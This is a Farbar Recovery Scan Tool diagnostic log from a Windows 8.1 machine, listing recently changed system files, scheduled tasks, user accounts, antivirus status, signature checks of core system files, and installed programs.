2017-08-09 13:24 - 2017-07-14 13:35 - 005981184 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-08-09 13:24 - 2017-07-14 12:40 - 015254016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-08-09 13:24 - 2017-07-14 10:54 - 020270080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-08-09 13:24 - 2017-07-14 10:17 - 004546048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-08-09 13:24 - 2017-07-09 03:12 - 004169728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2017-08-09 13:24 - 2017-07-09 01:45 - 007078912 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll
2017-08-09 13:24 - 2017-07-09 01:05 - 003631616 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-08-09 13:24 - 2017-07-09 00:39 - 005274624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll
2017-08-09 13:24 - 2017-07-09 00:37 - 007797248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-08-09 13:24 - 2017-07-09 00:23 - 002749952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-08-09 13:24 - 2017-07-08 23:59 - 005270016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrepl40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstext40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2017-08-09 13:24 - 2017-06-13 16:22 - 001436160 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-08-09 13:24 - 2017-06-13 15:50 - 001547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2017-08-09 13:24 - 2017-06-12 04:02 - 002778112 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2017-08-09 13:24 - 2017-06-12 03:52 - 002463744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2017-08-09 13:24 - 2017-06-08 09:48 - 002457936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-08-09 13:24 - 2017-05-28 00:42 - 001115136 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll
2017-08-09 13:23 - 2017-08-02 11:17 - 000107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-08-09 13:23 - 2017-07-15 18:10 - 000536688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-08-09 13:23 - 2017-07-15 18:10 - 000140016 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-08-09 13:23 - 2017-07-15 18:06 - 000449840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-08-09 13:23 - 2017-07-15 18:06 - 000136832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2017-08-09 13:23 - 2017-07-15 04:08 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2017-08-09 13:23 - 2017-07-15 02:44 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2017-08-09 13:23 - 2017-07-14 14:44 - 000576512 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-08-09 13:23 - 2017-07-14 14:19 - 000817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-08-09 13:23 - 2017-07-14 13:26 - 001033216 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2017-08-09 13:23 - 2017-07-14 13:10 - 000806912 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-08-09 13:23 - 2017-07-14 12:23 - 003240960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-08-09 13:23 - 2017-07-14 12:07 - 001545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-08-09 13:23 - 2017-07-14 11:58 - 000800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-08-09 13:23 - 2017-07-14 10:48 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-08-09 13:23 - 2017-07-14 10:38 - 000663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-08-09 13:23 - 2017-07-14 10:17 - 000880640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2017-08-09 13:23 - 2017-07-14 10:12 - 000693248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-08-09 13:23 - 2017-07-14 10:09 - 013663744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-08-09 13:23 - 2017-07-14 09:53 - 002767872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-08-09 13:23 - 2017-07-14 09:50 - 001314816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-08-09 13:23 - 2017-07-14 09:48 - 000710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-08-09 13:23 - 2017-07-09 04:14 - 000376672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-08-09 13:23 - 2017-07-08 11:46 - 000377688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgrx.sys
2017-08-09 13:23 - 2017-07-08 11:16 - 007440728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-08-09 13:23 - 2017-07-08 11:16 - 001674520 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-08-09 13:23 - 2017-07-08 11:16 - 001534072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-08-09 13:23 - 2017-07-08 11:16 - 001499920 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-08-09 13:23 - 2017-07-08 11:16 - 001370328 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-08-09 13:23 - 2017-07-08 11:16 - 000086360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-08-09 13:23 - 2017-07-01 21:47 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswdat10.dll
2017-08-09 13:23 - 2017-07-01 21:47 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswstr10.dll
2017-08-09 13:23 - 2017-07-01 21:47 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjint40.dll
2017-08-09 13:23 - 2017-07-01 21:47 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjter40.dll
2017-08-09 13:23 - 2017-06-25 00:46 - 000424448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll
2017-08-09 13:23 - 2017-06-25 00:16 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll
2017-08-09 13:23 - 2017-06-15 22:17 - 002551808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-08-09 13:23 - 2017-06-15 22:16 - 001920000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-08-09 13:23 - 2017-06-14 01:51 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-08-09 13:23 - 2017-06-14 01:23 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2017-08-09 13:23 - 2017-06-14 01:19 - 000383488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlansec.dll
2017-08-09 13:23 - 2017-06-14 01:16 - 000024064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2017-08-09 13:23 - 2017-06-14 01:11 - 000238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2017-08-09 13:23 - 2017-06-14 01:07 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanmsm.dll
2017-08-09 13:23 - 2017-06-13 22:17 - 000656384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2017-08-09 13:23 - 2017-06-13 22:16 - 000252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2017-08-09 13:23 - 2017-06-13 17:47 - 000445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2017-08-09 13:23 - 2017-06-13 17:09 - 000445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-08-09 13:23 - 2017-06-13 16:16 - 000445952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2017-08-09 13:23 - 2017-06-13 16:10 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2017-08-09 13:23 - 2017-06-13 16:07 - 000301568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityService.dll
2017-08-09 13:23 - 2017-06-13 16:03 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2017-08-09 13:23 - 2017-06-13 15:54 - 000374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2017-08-09 13:23 - 2017-06-12 08:14 - 000276320 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-08-09 13:23 - 2017-06-12 04:13 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\umrdp.dll
2017-08-09 13:23 - 2017-06-12 04:11 - 000346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll
2017-08-09 13:23 - 2017-06-12 04:02 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll
2017-08-09 13:23 - 2017-06-09 21:47 - 000448629 _____ C:\WINDOWS\system32\ApnDatabase.xml
2017-08-09 13:23 - 2017-06-09 01:01 - 001737600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-08-09 13:23 - 2017-06-09 01:01 - 001502000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-08-09 13:23 - 2017-06-07 12:25 - 000428888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2017-08-09 13:23 - 2017-06-07 02:38 - 000607232 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-08-09 13:23 - 2017-06-07 01:44 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-08-09 13:23 - 2017-05-28 00:38 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdsdwmdr.dll
2017-08-09 10:18 - 2017-08-11 10:46 - 000000307 _____ C:\Users\Ligaya\Desktop\Yes I Travel.txt
2017-08-06 11:48 - 2017-08-06 11:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bluetooth Devices
2017-08-05 20:31 - 2017-08-18 16:44 - 000000000 ____D C:\Users\Ligaya\AppData\LocalLow\uTorrent
2017-07-31 09:30 - 2017-07-31 09:30 - 000226989 _____ C:\Users\Ligaya\Desktop\document-checklist.pdf
2017-07-29 10:56 - 2017-07-29 10:56 - 000000000 ____D C:\Users\Ligaya\Desktop\Blog Media Kit
2017-07-29 08:30 - 2017-08-04 11:01 - 000013285 _____ C:\Users\Ligaya\Desktop\UK visa.txt
2017-07-24 17:02 - 2017-07-24 17:03 - 001562366 _____ C:\Users\Ligaya\Desktop\Travel Young Batanes packages.zip
2017-07-24 09:19 - 2017-08-16 22:57 - 000000951 _____ C:\Users\Ligaya\Desktop\Winter-Instagram-Set - Shortcut.lnk
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-08-19 07:39 - 2014-12-11 13:23 - 000000000 ____D C:\Users\Ligaya
2017-08-19 07:20 - 2013-08-22 22:45 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-19 07:20 - 2013-08-22 21:25 - 000524288 ___SH C:\WINDOWS\system32\config\BBI
2017-08-19 07:19 - 2015-12-09 22:03 - 000003016 _____ C:\Users\Ligaya\Desktop\TRAVEL.txt
2017-08-19 07:18 - 2015-06-16 14:50 - 000000932 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004UA.job
2017-08-19 07:14 - 2013-03-19 12:18 - 000000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2017-08-19 06:51 - 2013-11-13 07:01 - 000000914 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002UA.job
2017-08-19 03:53 - 2015-04-01 07:09 - 000000000 ___DO C:\Users\Ligaya\OneDrive
2017-08-19 02:19 - 2014-12-11 13:29 - 000003600 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1090255531-1958037965-2896169239-1004
2017-08-19 02:06 - 2014-12-11 13:39 - 000003914 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{A00539B4-377F-40D3-A2B9-B62AE3D1351C}
2017-08-19 01:06 - 2013-08-22 21:36 - 000000000 ____D C:\WINDOWS\Inf
2017-08-18 22:34 - 2013-08-22 23:36 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-18 21:22 - 2014-09-24 15:20 - 000865408 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-18 19:54 - 2014-12-13 11:27 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\vlc
2017-08-18 16:44 - 2014-12-11 18:55 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\uTorrent
2017-08-18 14:51 - 2013-11-13 07:01 - 000000862 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002Core.job
2017-08-18 13:18 - 2015-06-16 14:50 - 000000880 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004Core.job
2017-08-18 12:22 - 2017-05-17 12:10 - 000003640 _____ C:\WINDOWS\System32\Tasks\G2MUploadTask-S-1-5-21-1090255531-1958037965-2896169239-1004
2017-08-18 12:22 - 2017-05-17 12:10 - 000003544 _____ C:\WINDOWS\System32\Tasks\G2MUpdateTask-S-1-5-21-1090255531-1958037965-2896169239-1004
2017-08-18 12:16 - 2014-12-11 13:46 - 000002217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-18 12:16 - 2014-12-11 13:46 - 000002205 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-08-18 00:35 - 2013-09-05 10:45 - 000544424 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-13 10:35 - 2013-08-22 23:36 - 000000000 ____D C:\WINDOWS\rescache
2017-08-13 09:32 - 2015-11-01 03:50 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-08-13 09:30 - 2014-12-11 14:02 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\Dropbox
2017-08-10 08:54 - 2013-08-22 23:36 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-10 06:56 - 2015-11-01 03:51 - 000004476 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-08-09 20:32 - 2013-08-22 22:44 - 000855176 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-09 15:57 - 2012-07-26 15:59 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-09 15:52 - 2014-04-18 12:17 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-09 15:47 - 2014-04-18 12:17 - 140394280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-09 12:54 - 2013-09-01 15:44 - 000004288 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-08-09 12:54 - 2013-08-22 23:36 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-08-09 12:54 - 2013-08-22 23:36 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-08-01 20:17 - 2016-11-02 19:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-08-01 20:17 - 2013-09-01 15:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-08-01 14:15 - 2016-11-03 11:14 - 000000000 ____D C:\Users\Ligaya\AppData\LocalLow\Mozilla
2017-07-29 08:03 - 2017-06-16 08:32 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-07-29 08:03 - 2017-06-16 08:32 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-07-25 09:29 - 2014-12-28 11:30 - 000000132 _____ C:\Users\Ligaya\AppData\Roaming\Adobe PNG Format CS5 Prefs
 
==================== Files in the root of some directories =======
 
2014-12-28 11:30 - 2017-07-25 09:29 - 000000132 _____ () C:\Users\Ligaya\AppData\Roaming\Adobe PNG Format CS5 Prefs
2016-01-12 22:46 - 2017-06-15 16:04 - 000003072 _____ () C:\Users\Ligaya\AppData\Roaming\Photobook Designer Prefsv3
2015-05-18 05:14 - 2015-05-18 05:14 - 000000000 _____ () C:\Users\Ligaya\AppData\Local\{196D05A2-5FC9-4022-9799-D2FA56C73EE7}
2015-05-18 19:06 - 2015-05-18 19:06 - 000000000 _____ () C:\Users\Ligaya\AppData\Local\{B448E2D0-9A12-478D-BDDC-F5BC23D3691D}
2017-08-19 07:49 - 2017-08-19 07:49 - 000048706 _____ () C:\ProgramData\agent.1503100178.bdinstall.bin
2017-08-19 08:28 - 2017-08-19 08:28 - 000030126 _____ () C:\ProgramData\agent.uninstall.1503102514.bdinstall.bin
2017-08-19 07:51 - 2017-08-19 07:51 - 000030578 _____ () C:\ProgramData\agent.update.1503100260.bdinstall.bin
 
Some files in TEMP:
====================
2014-12-11 13:03 - 2014-12-11 13:03 - 000043008 _____ () C:\Users\Gaya\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpgvqfk0.dll
2015-12-07 15:01 - 2015-12-07 15:01 - 000071168 _____ () C:\Users\Ligaya\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmplpkrmp.dll
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-08-19 02:19
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 18-08-2017
Ran by Ligaya (19-08-2017 09:23:45)
Running from C:\Users\Ligaya\Desktop
Windows 8.1 Single Language (Update) (X64) (2014-12-09 02:48:08)
Boot Mode: Safe Mode (with Networking)
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1090255531-1958037965-2896169239-500 - Administrator - Disabled)
Guest (S-1-5-21-1090255531-1958037965-2896169239-501 - Limited - Disabled)
Ligaya (S-1-5-21-1090255531-1958037965-2896169239-1004 - Administrator - Enabled) => C:\Users\Ligaya
UpdatusUser (S-1-5-21-1090255531-1958037965-2896169239-1001 - Limited - Enabled) => C:\Users\UpdatusUser
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\uTorrent) (Version: 3.4.2.34944 - BitTorrent Inc.)
µTorrent (HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\uTorrent) (Version: 3.5.0.43916 - BitTorrent Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.012.20095 - Adobe Systems Incorporated)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.16 - Adobe Systems)
Adobe Flash Player 26 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 26.0.0.151 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Canon PowerShot ELPH 330 HS_IXUS 255 HS Camera User Guide (HKLM-x32\...\CameraUserGuide-PSELPH330HS_IXUS255HS) (Version: 1.0.0.1 - Canon Inc.)
Canon Utilities CameraWindow DC 8 (HKLM-x32\...\CameraWindowDC) (Version: 8.10.0.16 - Canon Inc.)
Canon Utilities ImageBrowser EX (HKLM-x32\...\ImageBrowser EX) (Version: 1.5.0.6 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.23.47 - Canon Inc.)
Citrix Online Launcher (HKLM-x32\...\{48947098-A67C-46D4-90C5-9F2F6F0F96FE}) (Version: 1.0.449 - Citrix)
Citrix Online Launcher (HKLM-x32\...\{75B8A55E-0762-4676-AAC0-6FDF025B034B}) (Version: 1.0.220 - Citrix)
CM Installer (HKLM-x32\...\{E8F42777-958D-4C14-9A42-8DCA1929FD26}) (Version: 1.0.0.0 - Cyanogen Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 1.5.0.0 - Dell Inc.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.5.0.0 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{D9ED3EFC-AB00-4CE0-ADED-80EE6B1158A7}) (Version: 2.2.2000.0 - Dell Products, LP)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 16.2.12.13 - Synaptics Incorporated)
Digiprint Photobooks V3.5 (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Digiprint Photobooks V3.5) (Version: Digiprint Photobooks V3.5 3.5.0 - LBC IMAGING NETWORK INC)
Dropbox (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Dropbox) (Version: 2.10.52 - Dropbox, Inc.)
Dropbox (HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Dropbox) (Version: 32.4.23 - Dropbox, Inc.)
Epson Event Manager (HKLM-x32\...\{C9AC7ED6-FD1C-4E83-8553-ECF8BCA111E8}) (Version: 3.01.0007 - Seiko Epson Corporation)
EPSON L210 Series Printer Uninstall (HKLM\...\EPSON L210 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson User's Guide L210 Series (HKLM-x32\...\L210 Series Useg) (Version:  - )
Extended Asian Language font pack for Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-2530-0000-AC0F074E4100}) (Version: 15.007.20033 - Adobe Systems Incorporated)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.101 - Google Inc.)
Google Chrome (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
GoToMeeting 7.0.4.2033 (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\GoToMeeting) (Version: 7.0.4.2033 - CitrixOnline)
HL-L2360D series (HKLM-x32\...\{46B58839-2405-48D6-A59D-F8246158A6ED}) (Version: 1.0.1.0 - Brother Industries, Ltd.)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{0728A184-F899-4356-B93D-8228674F0DEB}) (Version: 2.6.1209.0268 - Motorola Solutions, Inc.)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel® Turbo Boost Technology Monitor 2.6 (HKLM\...\{6C9365EB-1F9E-4893-9196-3EC77C88D0C5}) (Version: 2.6.2.0 - Intel)
Intel® PROSet/Wireless Software (HKLM-x32\...\{c9967fbd-e3c3-4ed0-992a-5b33260f2944}) (Version: 16.1.5 - Intel Corporation)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java SE Development Kit 8 Update 25 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180250}) (Version: 8.0.250.18 - Oracle Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\OneDriveSetup.exe) (Version: 17.0.4029.0217 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
